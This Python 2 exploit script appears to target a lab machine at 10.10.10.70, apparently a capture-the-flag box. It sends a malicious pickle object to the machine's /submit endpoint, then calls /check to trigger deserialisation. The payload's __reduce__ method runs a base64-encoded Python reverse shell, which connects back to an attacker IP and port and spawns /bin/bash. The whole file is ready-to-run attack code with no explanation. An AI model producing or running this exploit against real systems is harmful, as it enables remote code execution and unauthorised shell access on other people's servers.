import sys
import requests
import cPickle
from base64 import b64encode
from hashlib import md5

if len(sys.argv) < 2:
    print "[*] usage: pwn.py <ip> <port>"
    sys.exit(0)

IP = sys.argv[1]
PORT = sys.argv[2]

SHELL = '''python -c "import os;import pty;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('%s',%i));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash');"''' % (IP, int(PORT))

canape = "http://10.10.10.70/%s"

class PickleRCE(object):
    def __reduce__(self):
        import os
        return (os.system,("echo %s | base64 -d |bash" % b64encode(SHELL),))

def send_payload():
    host = canape % "submit"
    payload = cPickle.dumps(PickleRCE()) + "homer"
    post_data = { "character": payload, "quote": "nothing" }
    # print "[*] Payload: %s" % payload

    try:
        res = requests.post(host, data=post_data, timeout=5)
        print "[*] Payload successfuly sent."

    except requests.exceptions.ConnectTimeout or requests.exceptions.ConnectionError:
        print "[!] Error: something happend with connection."
        sys.exit(1)

    character = post_data["character"]
    quote = post_data["quote"]
    file_id = md5(character + quote).hexdigest()

    return file_id

def check(id):
    host = canape % "check"
    post_data = { "id": id }
    res = None

    try:
        res = requests.post(host, data=post_data, timeout=2)
    except requests.exceptions.ReadTimeout:
        print "[+] Shell session opened."
        sys.exit(0)
    return res.status_code

file_id = send_payload()
print "[+] id: %s" % file_id

response = check(file_id)
print "[+] Status: %i" % response